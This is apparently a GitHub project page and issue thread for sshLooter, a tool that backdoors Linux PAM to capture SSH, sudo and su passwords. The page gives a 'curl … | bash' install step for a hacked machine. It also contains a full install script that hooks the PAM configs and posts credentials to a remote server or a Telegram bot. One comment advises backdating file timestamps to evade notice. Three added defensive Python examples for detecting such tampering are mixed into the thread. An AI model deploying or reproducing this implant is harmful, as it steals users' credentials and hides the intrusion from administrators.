sshlooter's Introduction

DON'T USE THIS

There's a C version which is much better: sshLooterC

sshLooter

Script to steal passwords from ssh.

Install

git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration

Edit the install.sh script and add your Telegram bot API key and your user ID.
Message @botfather on Telegram to create a bot, and message @userinfobot to get your user ID.

Usage

On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash

Original script from

ChokePoint

My post about this script

Stealing SSH credentials Another Approach.

sshlooter's People

Contributors

mthbernardes


sshlooter's Issues

Check auth before logout

If you use an old requests module, you can lose access to the server forever.
If the Python script crashes, the PAM module will receive PAM_AUTH_ERR and you will never log in to this server.

Feb 19 15:59:00 google /lib/security/looter.py[29140]: Traceback (most recent call last):
Feb 19 15:59:00 google /lib/security/looter.py[29140]:   File "/lib/security/looter.py", line 34, in pam_sm_authenticate
Feb 19 15:59:00 google /lib/security/looter.py[29140]:     sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
Feb 19 15:59:00 google /lib/security/looter.py[29140]:   File "/lib/security/looter.py", line 11, in sendMessage
Feb 19 15:59:00 google /lib/security/looter.py[29140]:     r = requests.post(url,json=data)
Feb 19 15:59:00 google /lib/security/looter.py[29140]:   File "/usr/lib/python2.7/dist-packages/requests/api.py", line 85, in post
Feb 19 15:59:00 google /lib/security/looter.py[29140]:     return request('post', url, data=data, **kwargs)
Feb 19 15:59:00 google /lib/security/looter.py[29140]:   File "/usr/lib/python2.7/dist-packages/requests/api.py", line 40, in request
Feb 19 15:59:00 google /lib/security/looter.py[29140]:     return s.request(method=method, url=url, **kwargs)
Feb 19 15:59:00 google /lib/security/looter.py[29140]: TypeError: request() got an unexpected keyword argument 'json'

Possible solution:

    if not check_pw(user, resp.resp):
        return pamh.PAM_AUTH_ERR
    try:
      sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
    except:
      print "failed to send message"
    return pamh.PAM_SUCCESS

Or:

...
import json
...
def sendMessage(msg):
    headers = {'content-type': 'application/json'}
    apiKey = "KEY"
    userId = "USERID"
    data = {"chat_id":userId,"text":msg}
    url = "https://api.telegram.org/bot{}/sendMessage".format(apiKey)
    r = requests.post(url, data=json.dumps(data), timeout=30, headers=headers)
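The traceback quoted in this issue is also a detection artifact: the syslog tag is the path of a script sitting in a PAM module directory. The following is an added example, not code from the sshLooter project, that scans syslog text for such tags; the sample lines are constructed from the format quoted above, and the directory and extension patterns are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: two lines in the format quoted in the issue above, plus
# one ordinary sshd line (host, PID and address are made up).
SAMPLE = """\
Feb 19 15:59:00 google /lib/security/looter.py[29140]: Traceback (most recent call last):
Feb 19 15:59:00 google /lib/security/looter.py[29140]: TypeError: request() got an unexpected keyword argument 'json'
Feb 19 15:59:02 google sshd[29141]: Failed password for root from 192.0.2.10 port 50022 ssh2
"""

# Classic syslog layout: "Mon DD HH:MM:SS host tag[pid]: message"
LINE = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) (\S+) (\S+?)\[(\d+)\]: (.*)$")
# Assumption: directories where PAM modules usually live on Linux.
PAM_DIRS = re.compile(r"^(/usr)?/lib(64)?(/[\w.-]+)?/security/")
# Assumption: extensions that mark an interpreted script (compiled modules end in .so).
SCRIPT = re.compile(r"\.(py|pyc|sh|pl|rb)$")


def find_scripted_pam_modules(text):
    """Return {script_path: [messages]} for every syslog tag that names a
    script file inside a PAM module directory."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        tag, msg = m.group(3), m.group(5)
        if PAM_DIRS.match(tag) and SCRIPT.search(tag):
            hits[tag].append(msg)
    return dict(hits)


if __name__ == "__main__":
    for path, msgs in find_scripted_pam_modules(SAMPLE).items():
        print(path, "logged", len(msgs), "line(s); first:", msgs[0])
```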

Suggestion to be sneaky

If it were me I would parse the timestamp on the edited files and use touch -d to set the timestamp on the file so it doesn't show up as a recently modified file. Additionally you can set created files' timestamps using something like touch -r /etc/pam.d createdpythonfiles.py
Just thought I would share that in case you wanted to make it harder to notice.
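For anyone checking a host for this kind of tampering: touch changes a file's access and modification times, but the kernel stamps the inode change time (ctime) at the moment of that call. The following is an added example, not part of the original thread or project, that lists files whose ctime is recent while their mtime is old; it assumes a Linux filesystem, and the function names and the one-hour window are hypothetical choices.

```python
import os
import tempfile
import time


def backdated_files(root, window_s, now=None):
    """Return sorted paths under root whose inode change time (ctime) falls in
    the last window_s seconds while their mtime is older than that window."""
    now = time.time() if now is None else now
    cutoff = now - window_s
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if st.st_ctime >= cutoff and st.st_mtime < cutoff:
                found.append(path)
    return sorted(found)


def demo():
    """Constructed test tree: one file left alone, one with its mtime set a year back."""
    with tempfile.TemporaryDirectory() as root:
        normal = os.path.join(root, "common-auth")
        odd = os.path.join(root, "sshd")
        for p in (normal, odd):
            with open(p, "w") as fh:
                fh.write("# constructed sample\n")
        year_ago = time.time() - 365 * 86400
        # Same effect on atime/mtime as the touch commands mentioned above.
        os.utime(odd, (year_ago, year_ago))
        return [os.path.basename(p) for p in backdated_files(root, 3600)]


if __name__ == "__main__":
    # On a real host, point this at /etc/pam.d and the PAM module directory.
    print(demo())
```

Package upgrades also leave old mtimes next to fresh ctimes, so compare any hits against the package manager's log before treating them as tampering.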

modify and not work :(

Hey, I tried to modify the code so the result is sent through some web POST ...


#!/bin/bash

Install dependencies to create a PAM module using python (Except for python-pip)

apt-get install python-pam libpam-python python-pip

Install dependencies python

pip install requests crypt spwd

Check if exist the entrie on pam, for this module

if ! grep -Fq "looter.py" /etc/pam.d/sshd;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sshd
fi

if ! grep -Fq "looter.py" /etc/pam.d/sudo;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sudo
fi

if ! grep -Fq "looter.py" /etc/pam.d/su;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/su
fi

code='
import spwd
import crypt
import requests

def sendMessage(msg):
name = "ssh_creds.dat"
req = {"fname":name,"data":msg}
# url
url = "http://xxxxx/databases/.loot/log.php"
r = requests.post(url,data=req)

def check_pw(user, password):
"""Check the password matches local unix password on file"""
hashed_pw = spwd.getspnam(user)[1]
return crypt.crypt(password, hashed_pw) == hashed_pw

def pam_sm_authenticate(pamh, flags, argv):
try:
user = pamh.get_user()
except pamh.exception as e:
return e.pam_result

if not user:
    return pamh.PAM_USER_UNKNOWN
try:
    resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Password:"))
except pamh.exception as e:
    return e.pam_result

if not check_pw(user, resp.resp):
    return pamh.PAM_AUTH_ERR

sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
return pamh.PAM_SUCCESS

def pam_sm_setcred(pamh, flags, argv):
return pamh.PAM_SUCCESS

def pam_sm_acct_mgmt(pamh, flags, argv):
return pamh.PAM_SUCCESS

def pam_sm_open_session(pamh, flags, argv):
return pamh.PAM_SUCCESS

def pam_sm_close_session(pamh, flags, argv):
return pamh.PAM_SUCCESS

def pam_sm_chauthtok(pamh, flags, argv):
return pamh.PAM_SUCCESS
'
mkdir -p /lib/security/
echo "$code" > /lib/security/looter.py
/etc/init.d/ssh restart


but it doesn't send any logs :(
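The script above leaves a fixed trace in the PAM configuration: an auth rule in /etc/pam.d/sshd, sudo and su that loads pam_python.so with a script argument. The following is an added example, not code from the sshLooter project, that audits pam.d files for rules loading script-running modules; the sample file is constructed, and including pam_exec.so is an extension beyond what this page uses.

```python
import os
import re

# Constructed sample of /etc/pam.d/sshd after the sed line shown in the script above.
SAMPLE_SSHD = """\
# PAM configuration for the Secure Shell service
@include common-auth
auth requisite pam_python.so looter.py
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
"""

# pam.d rule: type, control (single word or [bracketed list]), module, optional arguments
RULE = re.compile(r"^(-?\w+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")
# Modules that hand a PAM decision to an interpreter or external program.
# pam_python.so is the one on this page; pam_exec.so is added as the stock equivalent.
SCRIPT_LOADERS = {"pam_python.so", "pam_exec.so"}


def audit_pam_file(service, text):
    """Return one finding per rule in a pam.d file that loads a script-running module."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("@include"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        ptype, control, module, args = m.groups()
        if module.rsplit("/", 1)[-1] in SCRIPT_LOADERS:
            findings.append({"service": service, "line": lineno,
                             "type": ptype.lstrip("-"), "control": control,
                             "module": module, "args": args.split()})
    return findings


def audit_pam_dir(path="/etc/pam.d"):
    """Run audit_pam_file over every regular file in a pam.d directory."""
    out = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, errors="replace") as fh:
                out.extend(audit_pam_file(name, fh.read()))
    return out
```

A finding is not proof of compromise, since pam_python.so and pam_exec.so have legitimate uses; check each reported script against the host's change records.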
